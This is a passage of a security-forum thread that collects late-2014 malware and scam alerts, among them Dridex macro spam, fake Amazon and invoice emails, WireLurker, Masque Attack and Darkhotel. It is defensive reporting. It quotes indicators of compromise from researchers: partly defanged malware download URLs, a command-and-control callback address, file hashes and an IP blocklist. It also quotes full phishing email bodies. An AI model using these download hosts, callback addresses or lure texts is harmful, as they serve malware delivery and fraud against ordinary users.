It then performs information theft through methods like form grabbing, screenshots, and site injections... Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature. The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into click the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature...
Top affected countries, based on data from September-October 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex4.jpg
We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.
Top DRIDEX spam sending countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex5.jpg
... best to make sure to enable the macro security features* in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings..."
* https://office.microsoft.com/en-us/visio-help/about-macro-security-levels-HP001049689.aspx
___

'Free' Netflix Accounts: Good Luck With That...
- https://blog.malwarebytes.org/fraud-scam/2014/11/sites-offering-free-netflix-accounts-good-luck-with-that/
Nov 5, 2014 - "We’ve seen a number of Netflix themed websites which claim to offer up accounts / logins for fans of TV and movie streaming to get their fix -without- having to register or -pay- up to use the service...
1) freenetflixaccount(dot)info
This one is rather cookie-cutter and claims to have lots of accounts up for grab, linking to numerous “Netflix premium account” URLs further down the page.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx1.jpg?w=564
However, all of the live links lead to the same survey page:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx4.jpg
To get your hands on the supposed account credentials, you’d have to fill in an offer or sign up to whatever happens to be presented to you. Am I sensing an incoming theme here?…
2) freenetflixaccountasap(dot)com
This website has the visitor play an extremely long-winded and elaborate game of “click the thing”, distracting them with lots of options to choose from in order to watch some movies.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx5.jpg
... According to the text underneath the many scrolling blue bars, they claim to log you into an account from your chosen region via proxy, set up a bunch of options then log you out. They then “upload the account details” to Fileice, and ask the visitor to “Click below to download the login details”.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx12.jpg
... > https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx13.jpg
... Interesting to note that the “newly created” page has an entry on VirusTotal* from just over a week ago... Always be wary when presented with supposedly free accounts – remember that there’s something in it for the person offering them up, and it could be anything from survey scam affiliate cash and fakeouts to phishing and Malware attacks..."
* https://www.virustotal.com/en/url/d7d219b5549e7159b0722596750bcdbe6345eb39af17d24105735a03fd345e95/analysis/
___

E-ZPass SPAM/Phish ...
- http://www.networkworld.com/article/2842773/security0/have-e-zpass-watch-out-for-slimy-asprox-based-malware-ploy.html
Nov 3, 2014 - "The Internet Crime Complaint Center* today said it has gotten more than 560 complaints about a rip-off using the E-ZPass vehicle toll collection system that uses phishing techniques to deliver malware to your computer. E-ZPass is an association of 26 toll agencies in 15 states that operate the E-ZPass toll collection program..."
* https://www.ic3.gov/media/2014/141103.aspx
"... The IC3 has received more than 560 complaints in which a victim receives an e-mail stating they have not paid their toll bill. The e-mail gives instructions to download the invoice by using the link provided, but the -link- is actually a .zip file that contains an executable with location aware malware. Some of the command and control server locations are associated with the ASProx botnet..."

- http://stopmalvertising.com/spam-scams/e-zpass-themed-emails-lead-to-asprox.html
9 July 2014
Screenshot: http://stopmalvertising.com/research/images/ezpass-asprox.jpg
___

20 million new strains of malware - Q3 2014
- http://www.pandasecurity.com/mediacenter/malware/over-20-million-new-strains-of-malware-were-indentified-in-q3-2014/
Oct 31, 2014 - "... some 20 million new strains were created worldwide in the third quarter of the year, at a rate of 227,747 new samples every day. Similarly, the global infection ratio was 37.93%, slightly up on the previous quarter (36.87%)... Trojans are still the most common type of malware (78.08%). A long way behind in second place come viruses (8.89), followed by worms (3.92%)... Trojans also accounted for most infections during this period, some 75% of the total, compared with 62.80% in the previous quarter. PUPs are still in second place, responsible for 14.55% of all infections, which is down on the second quarter figure of 24.77. These are followed by adware/spyware (6.88%), worms (2.09%), and viruses (1.48)..."

:mad: :fear:

FYI...

Fake Amazon SPAM - Word doc malware
- http://blog.mxlab.eu/2014/11/06/w97mdownloader-t-threat-attached-as-word-file-to-fake-emails-from-amazon-regarding-dispatched-order/
Nov 6, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Amazon .co.uk order has dispatched (#203-2083868-0173124)”. This email is sent from the spoofed address “Amazon .co.uk” <auto-shipping@ amazon .co.uk>” and has the following body:
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http ://www.amazon .co.uk/your-account
Your order #203-2083868-0173124 (received November 5, 2014)
Your right to cancel:
At Amazon .co.uk we want you to be delighted every time you shop with us. O=
ccasionally though, we know you may want to return items. Read more about o=
ur Returns Policy at: http ://www.amazon .co.uk/returns-policy/
Further, under the United Kingdom’s Distance Selling Regulations, you have =
the right to cancel the contract for the purchase of any of these items wit=
hin a period of 7 working days... If you’ve explored the above links but still need to get in touch with us, = you will find more contact details at the online Help Desk.=20
Note: this e-mail was sent from a notification-only e-mail address that can= not accept incoming e-mail.
Please do not reply to this message.=20
Thank you for shopping at Amazon .co.uk

The attached file has the name Mail Attachment.doc and is approx. 230 kB large file. The malicious Word file is detected as W97M/Downloader.t, W97M.DownLoader.110 or W97M.Dropper.Obfus. At the time of writing, 4 of the 54 AV engines did detect the malicious file at Virus Total*..."
* https://www.virustotal.com/en/file/99077f53365f931bddb4028793f9722c25b7095ae61eae3f6b31f9d7225e8c27/analysis/1415272790/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
- https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/
___

Fake 'Order' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/successfull_order-032574522-word-doc-malware/
6 Nov 2014 - "An email saying 'This is a notice that the invoice has been generated on 05.11.2014' pretending to come from random names at random companies with a subject of 'Successfull_Order 032574522' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear Customer, [redacted]
This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 468824369.
Your credit card will be charged for 47.40 USD.
The payment and delivery information is in attached file.
Regards,
Systems Company,
Crocitto Greta

6 November 2014 : Order561104111.doc - Current Virus total detections: 6/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... embedded malware or macro..."
* https://www.virustotal.com/en/file/d16c465aade28e04c2b5d9488f8698affccd7e7dc0bf36b3ecfa996d33bcd7f6/analysis/1415152827/
___

Fake Bank SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-banque-royale-bank-interac-guillaume-gilnaught-fake-pdf-malware/
6 Nov 2014 - "'The Bank INTERAC to Guillaume Gilnaught was accepted' pretending to come from RBC Banque Royale < ibanking@ rbc .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/The-Bank-INTERAC-to-Guillaume-Gilnaught-was-accepted.png

6 November 2014: INTERAC_pmt_11062014_0345875.zip: Extracts to: INTERAC_pmt_11062014_0345875.exe
Current Virus total detections: 5/53* . This 'The Bank INTERAC to Guillaume Gilnaught was accepted" is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cf7454645f1116d370dcc1ea979bb31866600c15880f69920ba65cdf941d6ffe/analysis/1415290279/
___

Western Union Payment Confirmation Spam
- http://threattrack.tumblr.com/post/101929253328/western-union-payment-confirmation-spam
Nov 6, 2014 - "Subjects Seen:
WUBS Outgoing Payment Confirmation for SOTR4465838
Typical e-mail details:
... This is an automatically generated response: please do not reply to this e-mail. For enquiries please contact Customer Service.
Attached you will find the Outgoing Payment Confirmation for SOTR4465838. Please confirm all details are correct and notify us immediately if there are any discrepancies.
Thank you for your business!

Malicious File Name and MD5:
9574536_11062014.zip (5ED4C6DE460B2869088C523606415B4B)
9574536_11062014.exe (C8A8F049313D1C67F1BAAF338FE5EDE0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a0c7619e79b0504fac6a4441b0bdf838/tumblr_inline_nemiq798aI1r6pupn.png

Tagged: Western Union, Upatre
___

Apple blocks apps infected with WireLurker malware targeting iPhones and iPads
- http://www.theinquirer.net/inquirer/news/2379822/wirelurker-malware-targeting-iphones-and-ipads-via-mac-os-x
Nov 6, 2014 - "... Palo Alto Networks* discovered the malware threat that targets iPhones and iPads through Apple's Mac OS X operating system, putting an end to the age-old belief that iOS is virus-free. Apple has since responded, and said it has -blocked- third-party apps infected with the malware, which Palo Alto describes as the "biggest in scale" it has ever seen... "As always, we recommend that users download and install software from trusted sources.” Palo Alto discovered the new family of malware dubbed 'WireLurker', which is the first known malware that can attack iOS applications in a similar way to a traditional virus. Palo Alto describes the threat as heralding "a new era in malware attacking Apple's desktop and mobile platforms", and said that the malware is "the biggest in scale we have ever seen". WireLurker can attack iOS devices through Mac OS X using USB, and does so by installing third-party applications on non-jailbroken iPhones through 'enterprise provisioning'. The malware seems to be limited to China at present, where it is targeting devices via the Maiyadi App Store, a third-party Mac app store. WireLurker has been found in -467- OS X apps at Maiyadi, which Palo Alto claims have been downloaded 356,104 times so far... The firm also said that enterprises using Mac computers should ensure that mobile device traffic is routed through a threat prevention system."
* http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
___

Hacks devise new simplified Phishing
- http://www.darkreading.com/attacks-breaches/hackers-devise-new-simplified-phishing-method/d/d-id/1317242
Nov 5, 2014 - "... a more efficient way to get unwary online shoppers to part with their personal data and financial account information. The new technique, dubbed 'Operation Huyao' by the security researchers at Trend Micro* who discovered it, basically lessens the time and effort needed for attackers to mount a phishing campaign while also making such attacks harder to spot... only when the user actually attempts to make a purchase that the proxy program serves up a modified page that walks the victim through a checkout progress designed to extract personal information and payment card or bank account information... the phishers employed various blackhat SEO techniques to ensure that people doing specific product-related searches online were served up with results containing malicious links to the targeted store. Users who clicked on the links were then routed to the department store's website via the malicious proxy... In the first half of 2014 for instance, the median uptime for phishing attacks was 8 hours and 42 minutes, meaning that half of all phishing attackers were active for less than nine, the APWG** has noted... Even so, phishing continues to be a major problem. In the first six months of 2014, the industry group counted more than 123,700 unique phishing attacks which was the highest since the second half of 2009. A total of -756- institutions were specifically targeted in these attacks, the largest number ever during a six-month period. Of these companies -Apple- was the most phished brand."
* http://blog.trendmicro.com/trendlabs-security-intelligence/new-phishing-technique-outfoxes-site-owners-operation-huyao/

** http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

CVE-2014-1772 – IE vuln analysis
- http://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/
Nov 5, 2014 - "... privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035*... this vulnerability was already patched some time ago... This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better..."
* https://technet.microsoft.com/en-us/library/security/ms14-035.aspx - Critical
Updated: Jun 17, 2014
V1.1 (June 17, 2014): Corrected the severity table and vulnerability information to add CVE-2014-2782 as a vulnerability addressed by this update. This is an informational change only. Customers who have already successfully installed the update do not need to take any action.
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1772 - 9.3 (HIGH)
Last revised: 06/26/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2782 - 9.3 (HIGH)
Last revised: 06/26/2014

:mad: :fear:

FYI...

'Dark market' websites seized in U.S., European busts - Silk Road 2.0
- http://www.reuters.com/article/2014/11/07/us-europol-cybersecurity-arrests-idUSKBN0IR0Z120141107
Nov 7, 2014
> http://s4.reutersmedia.net/resources/r/?m=02&d=20141107&t=2&i=989590213&w=580&fh=&fw=&ll=&pl=&r=LYNXMPEAA60EZ
"U.S. and European authorities on Friday announced the seizure of more than 400 secret website addresses and arrests of 16 people in a sweep targeting black markets for drugs and other illegal services. The developments were announced a day after prosecutors in New York unveiled criminal charges against the alleged operator of underground online drug marketplace Silk Road 2.0. U.S. authorities called the global sweep the largest law enforcement action to date against illegal websites operating on the so-called Tor network, which lets users communicate anonymously by masking their IP addresses... Europol, in a statement, said U.S. and European cyber crime units, in a sweep across 18 countries, had netted $1 million worth of Bitcoin, the digital currency, 180,000 euros in cash, silver, gold and narcotics. The more than 400 websites and domains seized on Thursday existed on the Tor network and were used by dozens of online marketplaces where such things as child pornography, guns and murder-for-hire could be purchased, authorities said. Sixteen people operating illegal sites were arrested in addition to the defendant in the Silk Road 2.0 case, Europol added, without specifying the charges... On Thursday, U.S. authorities said they had shut down Silk Road 2.0, a successor website to underground online drugs marketplace Silk Road. Blake Benthall, the alleged operator of Silk Road 2.0, was arrested and charged with -conspiracy- to commit drug trafficking, computer hacking, money laundering and other crimes. Troels Oerting, head of Europol's cybercrime center, said the operation knocked out a significant part of the infrastructure for illegal online drugs and weapons trade in the countries involved... The websites had complete business models, Oerting said, and displayed what they sold, including drugs, weapons, stolen credit cards..."
- http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
___

Fake invoice SPAM - malicious Word macro attachment
- http://blog.dynamoo.com/2014/11/sue-morckage-this-email-contains.html
7 Nov 2014 - "This -fake- invoice spam (all pretending to be from someone called Sue Morckage) comes with a malicious Word macro attachment.
From: Sue Morckage
Date: 7 November 2014 13:10
Subject: inovice 9232088 November
This email contains an invoice file attachment

The number in the subject is random, and attached is a document with the same format name (in this example invoice_9232088.doc). So far I have seen two attachments both with VT detection rates of 4/54 [1] [2]... which contains one of two malicious macros... which then go and download a binary from one of the following locations:
http ://ksiadzrobak .cba .pl/bin.exe > https://www.virustotal.com/en/ip-address/95.211.144.89/information/
http ://heartgate .de/bin.exe > https://www.virustotal.com/en/ip-address/81.169.145.156/information/
This binary gets copied into %TEMP%\AKETVJIJPZE.exe and it has a VirusTotal detection rate of just 1/54*, but so far automated analysis tools... are inconclusive as to what this does, however the payload is likely to be Cridex."
* https://www.virustotal.com/en/file/e479a2b6ef7098403c8e45d0d88be37856bb2301347f989a1708055d94c2227e/analysis/1415369050/

1] https://www.virustotal.com/en/file/7ce09f9a865bc889dd4737c1b3f5073d4512767d68604ea5913b59387f293844/analysis/1415365398/

2] https://www.virustotal.com/en/file/0db27aefbfae00b2658a360ec12445aabf0993fac6750b9c99b12e98bc3ebe4b/analysis/1415368736/

- http://myonlinesecurity.co.uk/sue-morckage-inovice-0394508-november-word-doc-malware/
7 Nov 2014
> https://www.virustotal.com/en/file/6ab64b9e14c7d8ad31794f36153276d8f50310e39e04a82935a573b8a0a982f1/analysis/1415372037/
___

Fake job sites ...
- http://blog.dynamoo.com/2014/11/europejobdayscom-and-other-fake-job.html
7 Nov 2014 - "This tip* from @peterkruse about a spam run pushing -fake- jobs using the domain europejobdays .com caught my eye, especially the mention of the nameservers using the stemcellcounseling.net domain. These -fake- job sites tend not to go alone, and a look a the other domains using the same namesevers comes up with a whole list of related -fake- sites... avoid**. You should be aware that the jobs on offer are actually part of some criminal enterprise such as money laundering or parcel reshipping. You can see a video that explains the parcel reshipping scam and the role of the parcel mule below:
> https://www.youtube.com/watch?v=UbSCXqL1jL4

* https://twitter.com/peterkruse/status/530628073264517120

** (Long list at the dynamoo URL at the top.)
___

Fake Tech Support website infections ...
- https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/
Nov 6, 2014 - "... Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or here in the U.S. This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being 'ahead of time technology equipment' while 'your computer issues are fixed securely'. This couldn’t be further from the truth. For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies... While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/blocked-1024x817.png
... One of the html files (a banner) contains a malicious script loading a page from a compromised website. This site contains an -iframe- with a dynamic URL that silently -redirects- the user to the Angler Exploit Kit... In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware... This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected... Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/eventviewer-1024x728.png
... here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely -bogus- . It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it. Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive... There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine. Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is -not- entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you. For more information on tech support scams and general advice, please check out our Tech Support -Scams- resource page*."
* https://blog.malwarebytes.org/tech-support-scams/

- http://www.symantec.com/connect/blogs/when-tech-support-scams-meet-ransomlock
7 Nov 2014 - "A technical-support phone scam uses Trojan.Ransomlock.AM to lock the user’s computer and trick them into calling a technical help phone number to resolve the issue...
Top ten ransomware detections as of 11-07-14:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%202.png
Fake BSoD lock screen:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%203%20edit.png ..."

- http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

:mad: :fear:

FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/kate-williams-invoice-6330089-november-word-doc-malware/
10 Nov 2014 - "'invoice 6330089 November' pretending to come from 'Kate Williams' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... Almost all of these malicious word documents appear to be -blank- when opened in protected view mode... The email looks like:

Please find attached your November invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 6330089 Account No 5606330089.
Thanks very much
Kate Williams

10 November 2014 : invoice_6330089.doc - Current Virus total detections: 0/51*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415612495/

- http://blog.dynamoo.com/2014/11/kate-williams-invoice-8798556-november.html
10 Nov 2014 - "... the malware connecting to 84.40.9.34 (Hostway, UK)..."

1] https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415613432/

2] https://www.virustotal.com/en/file/626f380c54d2dde9ea3ae4b77d79a8a2e7ca7af118d726e8ba4c5edaf4d34462/analysis/1415613431/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
___

Fake Amazon SPAM - malware-macros
- http://net-security.org/malware_news.php?id=2912
Nov 10, 2014 - "... According to AppRiver* researchers, two distinct malware delivery campaigns impersonating e-commerce giant Amazon are currently hitting inboxes. The first one is directed at UK users, and the company has already quarantined over 600,000 of these messages. The malicious email takes the form of a 'delivery confirmation message' and carries a Word document that supposedly contains the needed information. Unfortunately for those who open the file and have -macros- enabled in Word, the action triggers the installation of a Trojan dropper that downloads additional malware aimed at harvesting login credentials for various online services, including online banking. The second campaign comes in the form of an order confirmation from Amazon .com:
> http://www.net-security.org/images/articles/amazonphish-10112014-big.jpg
... AppRiver* pointed out. Also, this campaign is less intense than the first one - the company has blocked "only" about -160,000- messages so far. The supposed 'invoice file attached' is actually a Trojan dropper that will download additional malware once the host is infected..."
* http://blog.appriver.com/2014/11/malicious-amazon-emails-aim-to-infect-holiday-shoppers
"... This is a very popular time of the year for these types of scams with so many people in shopping mode in preparation for the holidays. With many people expecting purchase confirmations and shipping confirmations with much more frequency, it increases the likelihood that people will far for this scam. Be extra cautious this holiday shopping season and if you are suspicious of unauthorized activity on your Amazon account -never- follow the link in an email such as this, go directly to the website and check your account from there."
___

'Darkhotel malware' is targeting travelling execs via hotel WiFi
- http://www.theinquirer.net/inquirer/news/2380394/darkhotel-malware-is-targeting-travelling-execs-via-hotel-wifi
Nov 10, 2014 - "... 'Darkhotel' has been targeting travelling executives via hotel WiFi for the past four years, Kaspersky has warned, and is still active today. According to the security firm, 'Darkhotel' infects hotel networks with spying software which in turn infects the computers of targeted executives as soon as they connect to the hotel WiFi network. The executives are tricked into installing the information-stealing malware by disguising it as an update for legitimate software such as Adobe Flash, Google Toolbar or Windows Messenger. The malware then searches the computer for sensitive corporate data, cached passwords and log-in credentials..."
* https://securelist.com/blog/research/66779/the-darkhotel-apt/
Nov 10, 2014
___

Home Depot drops Windows for Mac ...
- http://www.theinquirer.net/inquirer/news/2380340/home-depot-drops-windows-for-mac-os-x-after-data-hack
Nov 10 2014 - "... Home Depot is reportedly shutting out the Windows operating system in favour of the Apple alternative as the firm continues to respond to the catastrophic breach on its systems. The hardware chain has confessed in some detail about the attack on its checkout and sales systems, and admitted to losses of data that affect tens of millions of customers... The Wall Street Journal* has more information on the Home Depot hack..."
* http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282
"... hackers got into its systems last April by stealing a password from a vendor, opening a tiny hole that grew into the biggest retail-credit-card breach on record. On Thursday, the company announced the breach was worse than earlier thought. In addition to the 56 million credit-card accounts that were compromised, Home Depot now says around 53 million customer email addresses were stolen as well..."
___

'All Your iOS Apps Belong to Us' - FireEye
- http://www.fireeye.com/blog/technical/cyber-exploits/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Nov 10, 2014 - "In July 2014, FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here:
> https://www.youtube.com/watch?feature=player_embedded&v=3VEQ-bJUhPw
We have notified Apple about this vulnerability on July 26... After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can -replace- authentic apps,such as banking and email apps, using attacker's malware through the Internet. That means the attacker can steal user's banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app's local data, which -wasn't- removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user's account directly. We have seen proofs that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves... By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from app store. Masque Attack has severe security consequences... In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/Untitled1.jpg
... Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
-- Mitigations: iOS users can protect themselves from Masque Attacks by following three steps:
- Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization.
- Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately..."
Figure 3:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/IMG_0001.jpg

:mad: :fear:

FYI...

Fake 'Bank Payment' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/11/nazarethcarecom-accounts-finchley-bank.html
11 Nov 2014 - "This -fake- invoice spam pretending to be from a care home in the UK comes with a malicious attachment.
From: Accounts Finchley [accounts.finchley@ nazarethcare .com]
Date: 11 November 2014 10:34
Subject: Bank Payments
Good Afternoon,
Paying in sheet attached
Regards
Sandra Whitmore
Care Home Administrator
Nazareth House
162 East End Road
East Finchley
London...
Nazareth Care Charitable Trust...

... The "from" field in an email is trivially easy to fake, as it looks like the body text may have been stolen from a compromised mailbox. Attached is a file 2014_11_07_14_09_19.doc which comes in two versions both with low VirusTotal detection rates [1] [2]. If macros are enabled then one of two macros... which then downloads a file from one of the following locations:
http ://www.grafichepilia .it/js/bin.exe
http ://dhanophan .co.th/js/bin.exe
This file gets copied to %TEMP%\HZLAFFLTDDO.exe and it has a VirusTotal detection rate of 3/53*. The Malwr report shows it phoning home to:
http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/
It also drops a DLL identified by VirusTotal** as Dridex."
1] https://www.virustotal.com/en/file/ba33302cdcb892cbc57b502c88775528aefed879d7515d468faea193436e46e9/analysis/1415703941/

2] https://www.virustotal.com/en/file/0a5f29b5ec667d27d1539521514dfb079b58449065df9aefc654fb16f1b83e1d/analysis/1415703952/

* https://www.virustotal.com/en/file/4c6dc38c88226dc461faaa7583ac4e53df822c919de7033428478f803f6d9ea8/analysis/1415704632/

** https://www.virustotal.com/en/file/110f884be52e0ef66f339fa122161f8e4fa66f7cd1f4a412d6ed0cd124d3f915/analysis/1415705610/


- http://myonlinesecurity.co.uk/bank-payments-pretending-come-accounts-finchley-word-doc-malware/
11 Nov 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Accounts-Finchley.png
___

Fake 'Duplicate Payment' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duplicate-payment-received-word-doc-malware/
11 Nov 2014 - "'Duplicate Payment Received' pretending to come from various random names with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £660.94 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Lenora Dunn
Accounts Department

11 November 2014 : De_VY955279R.doc - Current Virus total detections: 2/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e2a53e440bf4b5528d3ddd751b23410f91fa1fd27ef830b3493497c63b89a9bd/analysis/1415704035/

- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-has.html
11 Nov 2014
... Recommended blocklist:
178.254.57.146
213.140.115.29
62.76.180.133
62.76.189.108 "
___

Trojan SMS Found on Google Play
- https://blog.malwarebytes.org/mobile-2/2014/11/trojan-sms-found-on-google-play/
Nov 11, 2014 - "... this one slipped under Google Play’s radar, but an SMS Trojan app with the package name com.FREE_APPS_435.android claims to be a download for wallpapers, videos, and music is actively on the Google Play store (at least at the time of this writing it was).
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot1.jpg
... This tactic has been seen since malware started appearing on Android devices. If you visit the developer’s website from the link provided on the Google Play page, it takes you to a page with two banners and a couple of links.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot3.jpg
... Google Play has been notified of the existence of this SMS Trojan. The last update of this app was August 20th 2013, which was most likely the date it was added to the Play store. Many variants of this Trojan have been seen that are not currently on the Play store. We flag this Trojan and similar variants as Android/Trojan.SMS.Agent. This is proof that Google Play isn’t perfect at alleviating all malware."
___

Predator Pain and Limitless... the Fraud
- http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
